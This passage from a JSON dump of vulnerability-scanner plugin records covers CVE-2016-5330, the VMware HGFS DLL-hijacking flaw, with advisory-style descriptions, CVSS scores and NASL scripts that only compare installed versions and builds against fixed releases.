affected\nby an arbitrary code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of VMware Workstation installed on the remote host is\n12.1.x prior to 12.1.1. It is, therefore, affected by an arbitrary\ncode execution vulnerability in the Shared Folders (HGFS) feature due\nto improper loading of Dynamic-link library (DLL) files from insecure\npaths, including the current working directory, which may not be under\nuser control. A remote attacker can exploit this vulnerability, by\nplacing a malicious DLL in the path or by convincing a user into\nopening a file on a network share, to inject and execute arbitrary\ncode in the context of the current user.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2016-0010.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to VMware Workstation 12.1.1 or later.\n\nNote that VMware Tools on Windows-based guests that use the Shared\nFolders (HGFS) feature must also be updated to completely mitigate the\nvulnerability.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-5330\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'DLL Side Loading Vulnerability in VMware Host Guest Client Redirector');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/08/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/08/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/08/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:workstation\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"vmware_workstation_detect.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\", \"installed_sw/VMware Workstation\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"install_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\n\nappname = 'VMware Workstation';\n\ninstall = get_single_install(app_name:appname, exit_if_unknown_ver:TRUE);\nversion = install['version'];\npath = install['path'];\n\nfix = '';\nif (version =~ \"^12\\.1\\.\") fix = \"12.1.1\";\n\nif (!empty(fix) && ver_compare(ver:version, fix:fix, strict:FALSE) < 0)\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix + '\\n';\n security_report_v4(port:port, extra:report, severity:SECURITY_WARNING);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, appname, version, path);\n", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T07:00:06", "description": "The version of VMware Player installed on the remote host is 12.1.x\nprior to 12.1.1. It is, therefore, affected by an arbitrary code\nexecution vulnerability in the Shared Folders (HGFS) feature due to\nimproper loading of Dynamic-link library (DLL) files from insecure\npaths, including the current working directory, which may not be under\nuser control. A remote attacker can exploit this vulnerability, by\nplacing a malicious DLL in the path or by convincing a user into\nopening a file on a network share, to inject and execute arbitrary\ncode in the context of the current user.", "edition": 25, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2016-08-12T00:00:00", "title": "VMware Player 12.1.x < 12.1.1 Shared Folders (HGFS) Guest DLL Hijacking Arbitrary Code Execution (VMSA-2016-0010) (Linux)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-5330"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:vmware:player"], "id": "VMWARE_PLAYER_LINUX_VMSA_2016_0010.NASL", "href": "https://www.tenable.com/plugins/nessus/92944", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(92944);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2019/11/14\");\n\n script_cve_id(\"CVE-2016-5330\");\n script_bugtraq_id(92323);\n script_xref(name:\"VMSA\", value:\"2016-0010\");\n\n script_name(english:\"VMware Player 12.1.x < 12.1.1 Shared Folders (HGFS) Guest DLL Hijacking Arbitrary Code Execution (VMSA-2016-0010) (Linux)\");\n script_summary(english:\"Checks the VMware Player version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A virtualization application installed on the remote host is affected\nby an arbitrary code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of VMware Player installed on the remote host is 12.1.x\nprior to 12.1.1. It is, therefore, affected by an arbitrary code\nexecution vulnerability in the Shared Folders (HGFS) feature due to\nimproper loading of Dynamic-link library (DLL) files from insecure\npaths, including the current working directory, which may not be under\nuser control. A remote attacker can exploit this vulnerability, by\nplacing a malicious DLL in the path or by convincing a user into\nopening a file on a network share, to inject and execute arbitrary\ncode in the context of the current user.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.vmware.com/security/advisories/VMSA-2016-0010.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to VMware Player 12.1.1 or later.\n\nNote that VMware Tools on Windows-based guests that use the Shared\nFolders (HGFS) feature must also be updated to completely mitigate the\nvulnerability.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-5330\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'DLL Side Loading Vulnerability in VMware Host Guest Client Redirector');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/08/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/08/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/08/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:player\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"General\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"vmware_player_linux_installed.nbin\");\n script_require_keys(\"Host/VMware Player/Version\");\n script_exclude_keys(\"SMB/Registry/Enumerated\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nif (get_kb_item(\"SMB/Registry/Enumerated\")) audit(AUDIT_OS_NOT, \"Linux\", \"Windows\");\n\nversion = get_kb_item_or_exit(\"Host/VMware Player/Version\");\n\nfix = '';\nif (version =~ \"^12\\.1\\.\") fix = '12.1.1';\n\nif (!empty(fix) && ver_compare(ver:version, fix:fix, strict:FALSE) < 0)\n{\n report +=\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_report_v4(port:0, extra:report, severity:SECURITY_WARNING);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, \"VMware Player\", version);\n", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T07:00:06", "description": "The version of VMware Player installed on the remote host is 12.1.x\nprior to 12.1.1. It is, therefore, affected by an arbitrary code\nexecution vulnerability in the Shared Folders (HGFS) feature due to\nimproper loading of Dynamic-link library (DLL) files from insecure\npaths, including the current working directory, which may not be under\nuser control. A remote attacker can exploit this vulnerability, by\nplacing a malicious DLL in the path or by convincing a user into\nopening a file on a network share, to inject and execute arbitrary\ncode in the context of the current user.", "edition": 25, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2016-08-12T00:00:00", "title": "VMware Player 12.1.x < 12.1.1 Shared Folders (HGFS) Guest DLL Hijacking Arbitrary Code Execution (VMSA-2016-0010)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-5330"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:vmware:player"], "id": "VMWARE_PLAYER_WIN_VMSA_2016_0010.NASL", "href": "https://www.tenable.com/plugins/nessus/92945", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(92945);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2019/11/14\");\n\n script_cve_id(\"CVE-2016-5330\");\n script_bugtraq_id(92323);\n script_xref(name:\"VMSA\", value:\"2016-0010\");\n\n script_name(english:\"VMware Player 12.1.x < 12.1.1 Shared Folders (HGFS) Guest DLL Hijacking Arbitrary Code Execution (VMSA-2016-0010)\");\n script_summary(english:\"Checks the VMware Player version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A virtualization application installed on the remote host is affected\nby an arbitrary code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of VMware Player installed on the remote host is 12.1.x\nprior to 12.1.1. It is, therefore, affected by an arbitrary code\nexecution vulnerability in the Shared Folders (HGFS) feature due to\nimproper loading of Dynamic-link library (DLL) files from insecure\npaths, including the current working directory, which may not be under\nuser control. A remote attacker can exploit this vulnerability, by\nplacing a malicious DLL in the path or by convincing a user into\nopening a file on a network share, to inject and execute arbitrary\ncode in the context of the current user.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.vmware.com/security/advisories/VMSA-2016-0010.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to VMware Player 12.1.1 or later.\n\nNote that VMware Tools on Windows-based guests that use the Shared\nFolders (HGFS) feature must also be updated to completely mitigate the\nvulnerability.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-5330\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'DLL Side Loading Vulnerability in VMware Host Guest Client Redirector');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/08/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/08/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/08/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:player\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"vmware_player_detect.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\", \"installed_sw/VMware Player\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"install_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\n\ninstall = get_single_install(app_name:\"VMware Player\", exit_if_unknown_ver:TRUE);\nversion = install['version'];\npath = install['path'];\n\nfix = '';\nif (version =~ \"^12\\.1\\.\") fix = '12.1.1';\n\nif (!empty(fix) && ver_compare(ver:version, fix:fix, strict:FALSE) < 0)\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n\n report +=\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_report_v4(port:port, extra:report, severity:SECURITY_WARNING);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, \"VMware Player\", version, path);\n", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T03:30:03", "description": "The version of VMware Fusion installed on the remote Mac OS X host is\n8.1.x prior to 8.1.1. It is, therefore, affected by an arbitrary code\nexecution vulnerability in the Shared Folders (HGFS) feature due to\nimproper loading of Dynamic-link library (DLL) files from insecure\npaths, including the current working directory, which may not be under\nuser control. A remote attacker can exploit this vulnerability, by\nplacing a malicious DLL in the path or by convincing a user into\nopening a file on a network share, to inject and execute arbitrary\ncode in the context of the current user.", "edition": 26, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2016-08-12T00:00:00", "title": "VMware Fusion 8.1.x < 8.1.1 Shared Folders (HGFS) Guest DLL Hijacking Arbitrary Code Execution (VMSA-2016-0010)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-5330"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:vmware:fusion"], "id": "MACOSX_FUSION_VMSA_2016_0010.NASL", "href": "https://www.tenable.com/plugins/nessus/92943", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(92943);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2019/11/14\");\n\n script_cve_id(\"CVE-2016-5330\");\n script_bugtraq_id(92323);\n script_xref(name:\"VMSA\", value:\"2016-0010\");\n\n script_name(english:\"VMware Fusion 8.1.x < 8.1.1 Shared Folders (HGFS) Guest DLL Hijacking Arbitrary Code Execution (VMSA-2016-0010)\");\n script_summary(english:\"Checks Fusion version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A virtualization application installed on the remote Mac OS X host is\naffected by an arbitrary code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of VMware Fusion installed on the remote Mac OS X host is\n8.1.x prior to 8.1.1. It is, therefore, affected by an arbitrary code\nexecution vulnerability in the Shared Folders (HGFS) feature due to\nimproper loading of Dynamic-link library (DLL) files from insecure\npaths, including the current working directory, which may not be under\nuser control. A remote attacker can exploit this vulnerability, by\nplacing a malicious DLL in the path or by convincing a user into\nopening a file on a network share, to inject and execute arbitrary\ncode in the context of the current user.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.vmware.com/security/advisories/VMSA-2016-0010.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to VMware Fusion 8.1.1 or later.\n\nNote that VMware Tools on Windows-based guests that use the Shared\nFolders (HGFS) feature must also be updated to completely mitigate the\nvulnerability.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-5330\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'DLL Side Loading Vulnerability in VMware Host Guest Client Redirector');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/08/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/08/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/08/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:fusion\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_fusion_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"installed_sw/VMware Fusion\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"install_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"Host/local_checks_enabled\");\n\nos = get_kb_item(\"Host/MacOSX/Version\");\nif (!os) audit(AUDIT_OS_NOT, \"Mac OS X\");\n\ninstall = get_single_install(app_name:\"VMware Fusion\", exit_if_unknown_ver:TRUE);\nversion = install['version'];\npath = install['path'];\n\nfix = '';\nif (version =~ \"^8\\.1\\.\") fix = '8.1.1';\n\nif (!empty(fix) && ver_compare(ver:version, fix:fix, strict:FALSE) < 0)\n{\n report +=\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_report_v4(port:0, extra:report, severity:SECURITY_WARNING);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, \"VMware Fusion\", version, path);\n", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-09-22T10:55:14", "description": "The version of VMware Workstation installed on the remote host is\n12.1.x prior to 12.1.1. It is, therefore, affected by an arbitrary\ncode execution vulnerability in the Shared Folders (HGFS) feature due\nto improper loading of Dynamic-link library (DLL) files from insecure\npaths, including the current working directory, which may not be under\nuser control. A remote attacker can exploit this vulnerability, by\nplacing a malicious DLL in the path or by convincing a user into\nopening a file on a network share, to inject and execute arbitrary\ncode in the context of the current user.", "edition": 22, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2016-08-12T00:00:00", "title": "VMware Workstation 12.1.x < 12.1.1 Shared Folders (HGFS) Guest DLL Hijacking Arbitrary Code Execution (VMSA-2016-0010) (Linux)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-5330"], "modified": "2016-08-12T00:00:00", "cpe": ["cpe:/a:vmware:workstation"], "id": "VMWARE_WORKSTATION_LINUX_VMSA_2016_0010.NASL", "href": "https://www.tenable.com/plugins/nessus/92946", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(92946);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/21\");\n\n script_cve_id(\"CVE-2016-5330\");\n script_bugtraq_id(92323);\n script_xref(name:\"VMSA\", value:\"2016-0010\");\n\n script_name(english:\"VMware Workstation 12.1.x < 12.1.1 Shared Folders (HGFS) Guest DLL Hijacking Arbitrary Code Execution (VMSA-2016-0010) (Linux)\");\n script_summary(english:\"Checks VMware Workstation version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A virtualization application installed on the remote host is affected\nby an arbitrary code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of VMware Workstation installed on the remote host is\n12.1.x prior to 12.1.1. It is, therefore, affected by an arbitrary\ncode execution vulnerability in the Shared Folders (HGFS) feature due\nto improper loading of Dynamic-link library (DLL) files from insecure\npaths, including the current working directory, which may not be under\nuser control. A remote attacker can exploit this vulnerability, by\nplacing a malicious DLL in the path or by convincing a user into\nopening a file on a network share, to inject and execute arbitrary\ncode in the context of the current user.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.vmware.com/security/advisories/VMSA-2016-0010.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to VMware Workstation 12.1.1 or later.\n\nNote that VMware Tools on Windows-based guests that use the Shared\nFolders (HGFS) feature must also be updated to completely mitigate the\nvulnerability.\");\n script_set_attribute(attribute:\"agent\", value:\"unix\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-5330\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'DLL Side Loading Vulnerability in VMware Host Guest Client Redirector');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/08/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/08/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/08/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:workstation\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"General\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"vmware_workstation_linux_installed.nbin\");\n script_require_keys(\"Host/VMware Workstation/Version\");\n script_exclude_keys(\"SMB/Registry/Enumerated\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nif (get_kb_item(\"SMB/Registry/Enumerated\")) audit(AUDIT_OS_NOT, \"Linux\", \"Windows\");\n\nversion = get_kb_item_or_exit(\"Host/VMware Workstation/Version\");\n\nfix = '';\nif (version =~ \"^12\\.1\\.\") fix = '12.1.1';\n\nif (!empty(fix) && ver_compare(ver:version, fix:fix, strict:FALSE) < 0)\n{\n report +=\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_report_v4(port:0, extra:report, severity:SECURITY_WARNING);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, \"VMware Workstation\", version);\n", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T15:21:40", "description": "The remote VMware ESXi host is version 5.0, 5.1, 5.5, or 6.0 and is\nmissing a security patch. It is, therefore, affected by multiple\nvulnerabilities :\n\n - An arbitrary code execution vulnerability exists in the\n Shared Folders (HGFS) feature due to improper loading of\n Dynamic-link library (DLL) files from insecure paths,\n including the current working directory, which may not\n be under user control. A remote attacker can exploit\n this vulnerability, by placing a malicious DLL in the\n path or by convincing a user into opening a file on a\n network share, to inject and execute arbitrary code in\n the context of the current user. (CVE-2016-5330)\n\n - An HTTP header injection vulnerability exists due to\n improper sanitization of user-supplied input. A remote\n attacker can exploit this to inject arbitrary HTTP\n headers and conduct HTTP response splitting attacks.\n (CVE-2016-5331)", "edition": 28, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2016-08-12T00:00:00", "title": "ESXi 5.0 / 5.1 / 5.5 / 6.0 Multiple Vulnerabilities (VMSA-2016-0010) (remote check)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-5331", "CVE-2016-5330"], "modified": "2016-08-12T00:00:00", "cpe": ["cpe:/o:vmware:esxi"], "id": "VMWARE_VMSA-2016-0010_REMOTE.NASL", "href": "https://www.tenable.com/plugins/nessus/92949", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(92949);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2016-5330\", \"CVE-2016-5331\");\n script_bugtraq_id(92323, 92324);\n script_xref(name:\"VMSA\", value:\"2016-0010\");\n\n script_name(english:\"ESXi 5.0 / 5.1 / 5.5 / 6.0 Multiple Vulnerabilities (VMSA-2016-0010) (remote check)\");\n script_summary(english:\"Checks the ESXi version and build number.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote VMware ESXi host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote VMware ESXi host is version 5.0, 5.1, 5.5, or 6.0 and is\nmissing a security patch. It is, therefore, affected by multiple\nvulnerabilities :\n\n - An arbitrary code execution vulnerability exists in the\n Shared Folders (HGFS) feature due to improper loading of\n Dynamic-link library (DLL) files from insecure paths,\n including the current working directory, which may not\n be under user control. A remote attacker can exploit\n this vulnerability, by placing a malicious DLL in the\n path or by convincing a user into opening a file on a\n network share, to inject and execute arbitrary code in\n the context of the current user. (CVE-2016-5330)\n\n - An HTTP header injection vulnerability exists due to\n improper sanitization of user-supplied input. A remote\n attacker can exploit this to inject arbitrary HTTP\n headers and conduct HTTP response splitting attacks.\n (CVE-2016-5331)\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.vmware.com/security/advisories/VMSA-2016-0010.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://kb.vmware.com/kb/2142193\");\n script_set_attribute(attribute:\"see_also\", value:\"http://kb.vmware.com/kb/2143976\");\n script_set_attribute(attribute:\"see_also\", value:\"http://kb.vmware.com/kb/2141429\");\n script_set_attribute(attribute:\"see_also\", value:\"http://kb.vmware.com/kb/2144359\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch as referenced in the vendor advisory.\n\nNote that VMware Tools on Windows-based guests that use the Shared\nFolders (HGFS) feature must also be updated to completely mitigate\nCVE-2016-5330.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-5330\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'DLL Side Loading Vulnerability in VMware Host Guest Client Redirector');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/03/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/03/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/08/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esxi\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"vmware_vsphere_detect.nbin\");\n script_require_keys(\"Host/VMware/version\", \"Host/VMware/release\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nfixes = make_array(\n '5.0', '3982828',\n '5.1', '3872664',\n '5.5', '4179633',\n '6.0', '3620759'\n);\n\nsecurity_only_patches = make_array(\n '5.0', '3982819',\n '5.1', '3872638',\n '5.5', '4179631',\n '6.0', '3568943'\n);\n\nrel = get_kb_item_or_exit(\"Host/VMware/release\");\nif (\"ESXi\" >!< rel) audit(AUDIT_OS_NOT, \"ESXi\");\n\nver = get_kb_item_or_exit(\"Host/VMware/version\");\n\nmatch = pregmatch(pattern:\"^ESXi? ([0-9]+\\.[0-9]+).*$\", string:ver);\nver = match[1];\n\nif (ver != '5.0' && ver != '5.1' && ver != '5.5' && ver != '6.0')\n audit(AUDIT_OS_NOT, \"ESXi 5.0 / 5.1 / 5.5 / 6.0\");\n\nfixed_build = fixes[ver];\nsecurity_only_patch = security_only_patches[ver];\n\nif (empty_or_null(fixed_build)) audit(AUDIT_VER_FORMAT, ver);\n\nmatch = pregmatch(pattern:'^VMware ESXi.*build-([0-9]+)$', string:rel);\nif (isnull(match)) audit(AUDIT_UNKNOWN_BUILD, \"VMware ESXi\", \"5.0 / 5.1 / 5.5 / 6.0\");\n\nbuild = int(match[1]);\n\nif (build < fixed_build && build != security_only_patch)\n{\n if (!isnull(security_only_patch))\n fixed_build += ' / ' + security_only_patch + ' (security-only fix)';\n\n report = '\\n ESXi version : ' + ver +\n '\\n Installed build : ' + build +\n 